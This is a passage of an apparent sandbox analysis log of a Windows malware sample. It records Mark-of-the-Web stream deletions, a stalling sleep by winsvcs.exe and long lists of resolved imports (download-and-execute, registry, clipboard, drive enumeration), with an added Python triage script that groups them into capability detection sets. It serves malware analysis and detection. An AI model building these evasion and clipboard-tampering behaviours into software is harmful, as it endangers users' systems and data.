DeletedFile: C:\Users\user\AppData\Local\Temp\3750816931.exe:Zone.Identifier
DeletedFile: C:\Users\user\AppData\Local\Temp\1398632723.exe:Zone.Identifier
DeletedFile: C:\Users\user\AppData\Local\Temp\4032832645.exe:Zone.Identifier
DeletedFile: C:\Users\user\AppData\Local\Temp\1674315261.exe:Zone.Identifier
DeletedFile: C:\Users\user\AppData\Local\Temp\2459023548.exe:Zone.Identifier
DeletedFile: C:\Users\user\AppData\Local\Temp\3304035876.exe:Zone.Identifier
DeletedFile: C:\Users\user\AppData\Local\Temp\2400240831.exe:Zone.Identifier
DeletedFile: C:\Users\user\AppData\Local\Temp\2686919881.exe:Zone.Identifier
DeletedFile: C:\Users\user\AppData\Local\Temp\2293722122.exe:Zone.Identifier
DeletedFile: C:\Users\user\AppData\Local\Temp\1227434603.exe:Zone.Identifier
DeletedFile: C:\Users\user\AppData\Local\Temp\2673932424.exe:Zone.Identifier
DeletedFile: C:\Users\user\AppData\Local\Temp\2841536727.exe:Zone.Identifier
DeletedFile: C:\Windows\806084767800850\winsvcs.exe:Zone.Identifier
DeletedFile: C:\Users\user\AppData\Local\Temp\1495120250.exe:Zone.Identifier
DeletedFile: C:\Users\user\AppData\Local\Temp\1717238076.exe:Zone.Identifier
A process attempted to delay the analysis task.
Process: winsvcs.exe tried to sleep 1473 seconds, actually delayed analysis time by 0 seconds
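The signature entries on this page are flat lines: Zone.Identifier stream deletions, a sleep the sandbox fast-forwarded, and the long DynamicLoader list of imports each process resolved. The following Python is an added example, not CAPE's signature code, showing how an analyst can triage lines in this format. It counts deletions of the Zone.Identifier alternate data stream (the Mark-of-the-Web that Windows attaches to downloaded files; once it is gone the dropped copies no longer carry the "downloaded" marking), flags long sleeps the sandbox granted no time to, and groups resolved imports into capabilities such as download-and-execute, registry persistence, clipboard access and drive enumeration. The sample lines are constructed in the page's format; the capability sets, the two-hit threshold, the 300-second sleep cut-off and the 'possible-anti-debug' label are this example's own assumptions.

```python
"""Triage CAPE-style signature lines into analyst findings: Zone.Identifier
(Mark-of-the-Web) stream deletions, sandbox-skipped long sleeps, and resolved
imports grouped into capabilities. Sets and thresholds are this example's own."""
import re

DELETED_RE = re.compile(r"^DeletedFile:\s+(?P<path>.+?)(?::(?P<stream>Zone\.Identifier))?$")
SLEEP_RE = re.compile(r"^Process:\s+(?P<proc>\S+)\s+tried to sleep\s+(?P<asked>\d+)\s+seconds,"
                      r"\s+actually delayed analysis time by\s+(?P<actual>\d+)\s+seconds")
LOADER_RE = re.compile(r"^DynamicLoader:\s+(?P<module>[^/]+)/(?P<func>\S*)$")

CAPABILITIES = {   # a capability is claimed only when MIN_HITS of its APIs were resolved
    "download-and-execute": {"urlmon.dll/URLDownloadToFileW", "WININET.dll/InternetOpenUrlA",
                             "WININET.dll/InternetOpenUrlW", "WININET.dll/InternetReadFile",
                             "kernel32.dll/CreateProcessW", "SHELL32.dll/ShellExecuteW"},
    "registry-persistence": {"ADVAPI32.dll/RegCreateKeyExA", "ADVAPI32.dll/RegSetValueExW",
                             "ADVAPI32.dll/RegOpenKeyExW"},
    "clipboard-access": {"USER32.dll/OpenClipboard", "USER32.dll/GetClipboardData",
                         "USER32.dll/SetClipboardData", "USER32.dll/EmptyClipboard"},
    "drive-enumeration": {"kernel32.dll/GetLogicalDriveStringsW", "kernel32.dll/GetDriveTypeW",
                          "kernel32.dll/FindFirstFileW", "kernel32.dll/FindNextFileW"},
    "self-copy": {"kernel32.dll/GetModuleFileNameW", "kernel32.dll/CopyFileW",
                  "kernel32.dll/SetFileAttributesW", "kernel32.dll/CreateDirectoryW"},
    "single-instance-mutex": {"kernel32.dll/CreateMutexA", "kernel32.dll/CreateMutexW",
                              "kernel32.dll/OpenMutexW"},
    "process-enumeration": {"kernel32.dll/CreateToolhelp32Snapshot", "kernel32.dll/Process32FirstW",
                            "kernel32.dll/Process32NextW", "kernel32.dll/OpenProcess"},
    "possible-anti-debug": {"kernel32.dll/IsDebuggerPresent", "kernel32.dll/SetUnhandledExceptionFilter"},
}
MIN_HITS = 2
MOTW_THRESHOLD = 10       # the page's own "(10+)" anomaly threshold
LONG_SLEEP_SECS = 300     # assumption: anything longer is treated as stalling


def triage(lines):
    motw_removed, files_deleted, sleeps = [], [], []
    resolved, ordinal_only = set(), set()
    for raw in lines:
        line = raw.strip()
        if (m := DELETED_RE.match(line)):
            (motw_removed if m["stream"] else files_deleted).append(m["path"])
        elif (m := SLEEP_RE.match(line)):
            sleeps.append((m["proc"], int(m["asked"]), int(m["actual"])))
        elif (m := LOADER_RE.match(line)):
            if m["func"]:
                resolved.add(f"{m['module']}/{m['func']}")
            else:
                ordinal_only.add(m["module"])      # import by ordinal: the log carries no name
    capabilities = {}
    for name, apis in CAPABILITIES.items():
        hits = sorted(apis & resolved)
        if len(hits) >= MIN_HITS:
            capabilities[name] = hits
    findings = []
    if len(motw_removed) >= MOTW_THRESHOLD:
        findings.append(f"Mark-of-the-Web removed from {len(motw_removed)} files "
                        f"(Zone.Identifier stream deleted), first: {motw_removed[0]}")
    for proc, asked, actual in sleeps:
        if asked >= LONG_SLEEP_SECS and actual < asked:
            findings.append(f"{proc} requested a {asked}s sleep, sandbox granted {actual}s (stalling)")
    for name, hits in capabilities.items():
        findings.append(f"capability {name}: {', '.join(hits)}")
    if ordinal_only:
        findings.append(f"imports by ordinal (names unresolved): {', '.join(sorted(ordinal_only))}")
    return {"motw_removed": motw_removed, "files_deleted": files_deleted, "sleeps": sleeps,
            "capabilities": capabilities, "ordinal_only": sorted(ordinal_only), "findings": findings}


SAMPLE_LINES = [   # constructed in this page's signature format; numeric file names are illustrative
    r"DeletedFile: C:\Users\user\AppData\Local\Temp\4X6zg5pg.exe:Zone.Identifier",
    r"DeletedFile: C:\Windows\5769805074060605\winsvcs.exe:Zone.Identifier",
    r"DeletedFile: C:\Users\user\AppData\Local\Temp\old.tmp",
    "Process: winsvcs.exe tried to sleep 1473 seconds, actually delayed analysis time by 0 seconds",
    "DynamicLoader: urlmon.dll/URLDownloadToFileW",
    "DynamicLoader: WININET.dll/InternetOpenUrlA",
    "DynamicLoader: kernel32.dll/CreateProcessW",
    "DynamicLoader: ADVAPI32.dll/RegCreateKeyExA",
    "DynamicLoader: ADVAPI32.dll/RegSetValueExW",
    "DynamicLoader: USER32.dll/OpenClipboard",
    "DynamicLoader: USER32.dll/SetClipboardData",
    "DynamicLoader: kernel32.dll/GetLogicalDriveStringsW",
    "DynamicLoader: kernel32.dll/GetDriveTypeW",
    "DynamicLoader: kernel32.dll/FindFirstFileW",
    "DynamicLoader: kernel32.dll/CreateMutexA",          # one API of its set: below MIN_HITS
    "DynamicLoader: OLEAUT32.dll/",                      # ordinal import, no name
] + ["DeletedFile: C:\\Users\\user\\AppData\\Local\\Temp\\%d.exe:Zone.Identifier" % n
     for n in range(2841536727, 2841536736)]

if __name__ == "__main__":
    for finding in triage(SAMPLE_LINES)["findings"]:
        print("-", finding)
```

Two caveats the thresholds encode: a single resolved API proves little (CreateMutexA is also used by plenty of benign code, so one hit of the mutex set is not reported), and an import logged as "module/" with no function name was resolved by ordinal, so the name-based capability sets cannot see it and it is listed separately for manual follow-up.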
Dynamic (imported) function loading detected
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: kernel32.dll/GetVersionExA
DynamicLoader: kernel32.dll/TerminateProcess
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: msvcrt.dll/_controlfp
DynamicLoader: msvcrt.dll/_except_handler3
DynamicLoader: msvcrt.dll/__set_app_type
DynamicLoader: msvcrt.dll/__p__fmode
DynamicLoader: msvcrt.dll/memset
DynamicLoader: msvcrt.dll/__p__commode
DynamicLoader: msvcrt.dll/_adjust_fdiv
DynamicLoader: msvcrt.dll/__setusermatherr
DynamicLoader: msvcrt.dll/_initterm
DynamicLoader: msvcrt.dll/__getmainargs
DynamicLoader: msvcrt.dll/_acmdln
DynamicLoader: msvcrt.dll/exit
DynamicLoader: msvcrt.dll/_XcptFilter
DynamicLoader: msvcrt.dll/_exit
DynamicLoader: msvcrt.dll/_snprintf
DynamicLoader: msvcrt.dll/fclose
DynamicLoader: msvcrt.dll/fseek
DynamicLoader: msvcrt.dll/ftell
DynamicLoader: msvcrt.dll/srand
DynamicLoader: msvcrt.dll/rand
DynamicLoader: msvcrt.dll/_wfopen
DynamicLoader: msvcrt.dll/_snwprintf
DynamicLoader: WININET.dll/HttpQueryInfoA
DynamicLoader: WININET.dll/InternetCloseHandle
DynamicLoader: WININET.dll/InternetReadFile
DynamicLoader: WININET.dll/InternetOpenUrlW
DynamicLoader: WININET.dll/InternetOpenW
DynamicLoader: WININET.dll/InternetOpenUrlA
DynamicLoader: WININET.dll/InternetOpenA
DynamicLoader: urlmon.dll/URLDownloadToFileW
DynamicLoader: SHLWAPI.dll/PathFindFileNameW
DynamicLoader: SHLWAPI.dll/PathFindFileNameA
DynamicLoader: SHLWAPI.dll/PathFileExistsW
DynamicLoader: kernel32.dll/ExitThread
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/CreateMutexA
DynamicLoader: kernel32.dll/SetFileAttributesW
DynamicLoader: kernel32.dll/CreateThread
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/GetStartupInfoA
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: kernel32.dll/CreateProcessW
DynamicLoader: kernel32.dll/CreateDirectoryW
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/CopyFileW
DynamicLoader: ADVAPI32.dll/RegSetValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegCreateKeyExA
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: SHELL32.dll/ShellExecuteW
DynamicLoader: 4X6zg5pg.exe/atexit
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/Module32FirstW
DynamicLoader: kernel32.dll/GlobalAlloc
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: kernel32.dll/GetVersionExA
DynamicLoader: kernel32.dll/TerminateProcess
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: msvcrt.dll/_controlfp
DynamicLoader: msvcrt.dll/_except_handler3
DynamicLoader: msvcrt.dll/__set_app_type
DynamicLoader: msvcrt.dll/__p__fmode
DynamicLoader: msvcrt.dll/memset
DynamicLoader: msvcrt.dll/__p__commode
DynamicLoader: msvcrt.dll/_adjust_fdiv
DynamicLoader: msvcrt.dll/__setusermatherr
DynamicLoader: msvcrt.dll/_initterm
DynamicLoader: msvcrt.dll/__getmainargs
DynamicLoader: msvcrt.dll/_acmdln
DynamicLoader: msvcrt.dll/exit
DynamicLoader: msvcrt.dll/_XcptFilter
DynamicLoader: msvcrt.dll/_exit
DynamicLoader: msvcrt.dll/_snprintf
DynamicLoader: msvcrt.dll/fclose
DynamicLoader: msvcrt.dll/fseek
DynamicLoader: msvcrt.dll/ftell
DynamicLoader: msvcrt.dll/srand
DynamicLoader: msvcrt.dll/rand
DynamicLoader: msvcrt.dll/_wfopen
DynamicLoader: msvcrt.dll/_snwprintf
DynamicLoader: WININET.dll/HttpQueryInfoA
DynamicLoader: WININET.dll/InternetCloseHandle
DynamicLoader: WININET.dll/InternetReadFile
DynamicLoader: WININET.dll/InternetOpenUrlW
DynamicLoader: WININET.dll/InternetOpenW
DynamicLoader: WININET.dll/InternetOpenUrlA
DynamicLoader: WININET.dll/InternetOpenA
DynamicLoader: urlmon.dll/URLDownloadToFileW
DynamicLoader: SHLWAPI.dll/PathFindFileNameW
DynamicLoader: SHLWAPI.dll/PathFindFileNameA
DynamicLoader: SHLWAPI.dll/PathFileExistsW
DynamicLoader: kernel32.dll/ExitThread
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/CreateMutexA
DynamicLoader: kernel32.dll/SetFileAttributesW
DynamicLoader: kernel32.dll/CreateThread
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/GetStartupInfoA
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: kernel32.dll/CreateProcessW
DynamicLoader: kernel32.dll/CreateDirectoryW
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/CopyFileW
DynamicLoader: ADVAPI32.dll/RegSetValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegCreateKeyExA
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: SHELL32.dll/ShellExecuteW
DynamicLoader: winsvcs.exe/atexit
DynamicLoader: RASAPI32.dll/RasConnectionNotificationW
DynamicLoader: sechost.dll/NotifyServiceStatusChangeA
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: iphlpapi.DLL/GetAdaptersAddresses
DynamicLoader: DHCPCSVC.DLL/DhcpRequestParams
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/Module32FirstW
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: kernel32.dll/GetVersionExA
DynamicLoader: kernel32.dll/TerminateProcess
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: msvcrt.dll/_controlfp
DynamicLoader: msvcrt.dll/_except_handler3
DynamicLoader: msvcrt.dll/__set_app_type
DynamicLoader: msvcrt.dll/isalpha
DynamicLoader: msvcrt.dll/__p__fmode
DynamicLoader: msvcrt.dll/__p__commode
DynamicLoader: msvcrt.dll/_adjust_fdiv
DynamicLoader: msvcrt.dll/__setusermatherr
DynamicLoader: msvcrt.dll/_initterm
DynamicLoader: msvcrt.dll/__getmainargs
DynamicLoader: msvcrt.dll/_acmdln
DynamicLoader: msvcrt.dll/exit
DynamicLoader: msvcrt.dll/_XcptFilter
DynamicLoader: msvcrt.dll/_exit
DynamicLoader: msvcrt.dll/_snprintf
DynamicLoader: msvcrt.dll/wcsstr
DynamicLoader: msvcrt.dll/srand
DynamicLoader: msvcrt.dll/rand
DynamicLoader: msvcrt.dll/_snwprintf
DynamicLoader: msvcrt.dll/isdigit
DynamicLoader: msvcrt.dll/memset
DynamicLoader: msvcrt.dll/memcpy
DynamicLoader: WININET.dll/InternetOpenUrlA
DynamicLoader: WININET.dll/HttpQueryInfoA
DynamicLoader: WININET.dll/InternetCloseHandle
DynamicLoader: WININET.dll/InternetReadFile
DynamicLoader: WININET.dll/InternetOpenUrlW
DynamicLoader: WININET.dll/InternetOpenW
DynamicLoader: WININET.dll/InternetOpenA
DynamicLoader: urlmon.dll/URLDownloadToFileW
DynamicLoader: SHLWAPI.dll/PathFileExistsW
DynamicLoader: SHLWAPI.dll/PathFindFileNameA
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/GetFileAttributesW
DynamicLoader: kernel32.dll/CopyFileW
DynamicLoader: kernel32.dll/CreateDirectoryW
DynamicLoader: kernel32.dll/GetLogicalDriveStringsW
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: kernel32.dll/GetDriveTypeW
DynamicLoader: kernel32.dll/FindFirstFileW
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/GlobalUnlock
DynamicLoader: kernel32.dll/ExitThread
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/GlobalAlloc
DynamicLoader: kernel32.dll/GlobalLock
DynamicLoader: kernel32.dll/FindNextFileW
DynamicLoader: kernel32.dll/SetFileAttributesW
DynamicLoader: kernel32.dll/GetVolumeInformationW
DynamicLoader: kernel32.dll/CreateProcessW
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetStartupInfoA
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/CreateThread
DynamicLoader: kernel32.dll/CreateMutexA
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: USER32.dll/OpenClipboard
DynamicLoader: USER32.dll/EmptyClipboard
DynamicLoader: USER32.dll/GetClipboardData
DynamicLoader: USER32.dll/CloseClipboard
DynamicLoader: USER32.dll/SetClipboardData
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegSetValueExW
DynamicLoader: ADVAPI32.dll/RegCreateKeyExA
DynamicLoader: SHELL32.dll/ShellExecuteW
DynamicLoader: ole32.dll/CoInitialize
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: 2841536727.exe/atexit
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/Module32FirstW
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: kernel32.dll/GetVersionExA
DynamicLoader: kernel32.dll/TerminateProcess
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: msvcrt.dll/_controlfp
DynamicLoader: msvcrt.dll/_except_handler3
DynamicLoader: msvcrt.dll/__set_app_type
DynamicLoader: msvcrt.dll/isalpha
DynamicLoader: msvcrt.dll/__p__fmode
DynamicLoader: msvcrt.dll/__p__commode
DynamicLoader: msvcrt.dll/_adjust_fdiv
DynamicLoader: msvcrt.dll/__setusermatherr
DynamicLoader: msvcrt.dll/_initterm
DynamicLoader: msvcrt.dll/__getmainargs
DynamicLoader: msvcrt.dll/_acmdln
DynamicLoader: msvcrt.dll/exit
DynamicLoader: msvcrt.dll/_XcptFilter
DynamicLoader: msvcrt.dll/_exit
DynamicLoader: msvcrt.dll/_snprintf
DynamicLoader: msvcrt.dll/wcsstr
DynamicLoader: msvcrt.dll/srand
DynamicLoader: msvcrt.dll/rand
DynamicLoader: msvcrt.dll/_snwprintf
DynamicLoader: msvcrt.dll/isdigit
DynamicLoader: msvcrt.dll/memset
DynamicLoader: msvcrt.dll/memcpy
DynamicLoader: WININET.dll/InternetOpenUrlA
DynamicLoader: WININET.dll/HttpQueryInfoA
DynamicLoader: WININET.dll/InternetCloseHandle
DynamicLoader: WININET.dll/InternetReadFile
DynamicLoader: WININET.dll/InternetOpenUrlW
DynamicLoader: WININET.dll/InternetOpenW
DynamicLoader: WININET.dll/InternetOpenA
DynamicLoader: urlmon.dll/URLDownloadToFileW
DynamicLoader: SHLWAPI.dll/PathFileExistsW
DynamicLoader: SHLWAPI.dll/PathFindFileNameA
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/GetFileAttributesW
DynamicLoader: kernel32.dll/CopyFileW
DynamicLoader: kernel32.dll/CreateDirectoryW
DynamicLoader: kernel32.dll/GetLogicalDriveStringsW
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: kernel32.dll/GetDriveTypeW
DynamicLoader: kernel32.dll/FindFirstFileW
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/GlobalUnlock
DynamicLoader: kernel32.dll/ExitThread
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/GlobalAlloc
DynamicLoader: kernel32.dll/GlobalLock
DynamicLoader: kernel32.dll/FindNextFileW
DynamicLoader: kernel32.dll/SetFileAttributesW
DynamicLoader: kernel32.dll/GetVolumeInformationW
DynamicLoader: kernel32.dll/CreateProcessW
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetStartupInfoA
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/CreateThread
DynamicLoader: kernel32.dll/CreateMutexA
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: USER32.dll/OpenClipboard
DynamicLoader: USER32.dll/EmptyClipboard
DynamicLoader: USER32.dll/GetClipboardData
DynamicLoader: USER32.dll/CloseClipboard
DynamicLoader: USER32.dll/SetClipboardData
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegSetValueExW
DynamicLoader: ADVAPI32.dll/RegCreateKeyExA
DynamicLoader: SHELL32.dll/ShellExecuteW
DynamicLoader: ole32.dll/CoInitialize
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: winsvcs.exe/atexit
DynamicLoader: RASAPI32.dll/RasConnectionNotificationW
DynamicLoader: sechost.dll/NotifyServiceStatusChangeA
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/Module32FirstW
DynamicLoader: kernel32.dll/GlobalAlloc
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: kernel32.dll/GetVersionExA
DynamicLoader: kernel32.dll/TerminateProcess
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: kernel32.dll/OpenMutexW
DynamicLoader: kernel32.dll/GetSystemInfo
DynamicLoader: kernel32.dll/WaitForMultipleObjects
DynamicLoader: kernel32.dll/lstrcmpiW
DynamicLoader: kernel32.dll/GetUserDefaultUILanguage
DynamicLoader: kernel32.dll/DeleteCriticalSection
DynamicLoader: kernel32.dll/GetShortPathNameW
DynamicLoader: kernel32.dll/GetWindowsDirectoryW
DynamicLoader: kernel32.dll/GetVolumeInformationW
DynamicLoader: kernel32.dll/CreateThread
DynamicLoader: kernel32.dll/lstrcpyA
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/lstrcmpiA
DynamicLoader: kernel32.dll/Process32FirstW
DynamicLoader: kernel32.dll/Process32NextW
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/LeaveCriticalSection
DynamicLoader: kernel32.dll/EnterCriticalSection
DynamicLoader: kernel32.dll/VirtualLock
DynamicLoader: kernel32.dll/FindFirstFileW
DynamicLoader: kernel32.dll/MoveFileExW
DynamicLoader: kernel32.dll/FindFirstFileExW
DynamicLoader: kernel32.dll/WideCharToMultiByte
DynamicLoader: kernel32.dll/lstrcmpW
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: kernel32.dll/FindNextFileW
DynamicLoader: kernel32.dll/GetSystemTime
DynamicLoader: kernel32.dll/GetNativeSystemInfo
DynamicLoader: kernel32.dll/GetDriveTypeW
DynamicLoader: kernel32.dll/GetDiskFreeSpaceW
DynamicLoader: kernel32.dll/VirtualUnlock
DynamicLoader: kernel32.dll/VerSetConditionMask
DynamicLoader: kernel32.dll/VerifyVersionInfoW
DynamicLoader: kernel32.dll/SetLastError
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/LocalAlloc
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/LocalFree
DynamicLoader: kernel32.dll/GlobalAlloc
DynamicLoader: kernel32.dll/MulDiv
DynamicLoader: kernel32.dll/GetTempPathW
DynamicLoader: kernel32.dll/GlobalFree
DynamicLoader: kernel32.dll/ConnectNamedPipe
DynamicLoader: kernel32.dll/CreateNamedPipeW
DynamicLoader: kernel32.dll/CreateEventW
DynamicLoader: kernel32.dll/GetCurrentProcessId
DynamicLoader: kernel32.dll/GetFullPathNameW
DynamicLoader: kernel32.dll/SetStdHandle
DynamicLoader: kernel32.dll/GetConsoleMode
DynamicLoader: kernel32.dll/GetConsoleCP
DynamicLoader: kernel32.dll/FlushFileBuffers
DynamicLoader: kernel32.dll/OutputDebugStringW
DynamicLoader: kernel32.dll/HeapAlloc
DynamicLoader: kernel32.dll/RtlUnwind
DynamicLoader: kernel32.dll/ExitThread
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/TerminateProcess
DynamicLoader: kernel32.dll/OpenProcess
DynamicLoader: kernel32.dll/InitializeCriticalSection
DynamicLoader: kernel32.dll/GetDriveTypeA
DynamicLoader: kernel32.dll/GetCommandLineA
DynamicLoader: kernel32.dll/GetProcessHeap
DynamicLoader: kernel32.dll/GetComputerNameW
DynamicLoader: kernel32.dll/WaitForSingleObject
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: kernel32.dll/GetSystemDefaultUILanguage
DynamicLoader: kernel32.dll/CreateMutexW
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/lstrcpyW
DynamicLoader: kernel32.dll/lstrcatW
DynamicLoader: kernel32.dll/GetProcAddress
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/LoadLibraryW
DynamicLoader: kernel32.dll/GetSystemDirectoryW
DynamicLoader: kernel32.dll/GetModuleHandleW
DynamicLoader: kernel32.dll/GetCurrentProcess
DynamicLoader: kernel32.dll/LoadLibraryExW
DynamicLoader: kernel32.dll/VirtualQuery
DynamicLoader: kernel32.dll/MultiByteToWideChar
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: kernel32.dll/lstrlenA
DynamicLoader: kernel32.dll/lstrlenW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/ReadFile
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/UnlockFile
DynamicLoader: kernel32.dll/SetFilePointerEx
DynamicLoader: kernel32.dll/GetStdHandle
DynamicLoader: kernel32.dll/LCMapStringW
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: kernel32.dll/TlsSetValue
DynamicLoader: kernel32.dll/TlsGetValue
DynamicLoader: kernel32.dll/InitializeCriticalSectionAndSpinCount
DynamicLoader: kernel32.dll/SetUnhandledExceptionFilter
DynamicLoader: kernel32.dll/UnhandledExceptionFilter
DynamicLoader: kernel32.dll/GetStringTypeW
DynamicLoader: kernel32.dll/HeapFree
